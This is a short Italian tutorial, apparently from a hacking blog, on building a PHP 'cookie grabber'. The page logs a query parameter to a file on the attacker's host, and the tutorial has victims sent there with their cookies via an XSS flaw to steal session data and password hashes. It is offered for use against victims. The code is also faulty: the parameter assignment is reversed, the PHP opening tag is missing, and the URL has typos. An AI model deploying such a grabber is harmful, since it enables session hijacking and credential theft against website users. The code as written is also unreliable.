Ecco come costruire un cookie grabber, ovvero una pagina che se visitata ruba i cookie ai visitatori… questa pagina se mi avete già capito potrà essere sfruttata con una XSS!!!

1. Aprite un blocco note in windows o un semplice gedit o kate in linux!
2. Incollateci questo codice (che è il cookie grabber!):

$capo = “\n”;
$_GET[’data’] = $data;
$fh = fopen(”cookie.txt”,’a+’);
fwrite($fh, “$data”);
fwrite($fh, “$capo”);
fclose($fh);
?>

3. Salvate il tutto come rubacookie.php stando attenti (solo se usate il blocco note) a non usare salva con file .txt ma come tutti file!
4. Uppate tutto sul vostro host web…
5. Fate andare la vittima a http://www.tuositoesempio.com/rubacoockie.php?data=doocument.cookie

Ovviamente usato con una xss troverete nei cookie gli hash (password criptate del visitatore) del sito che vi interessa di più!!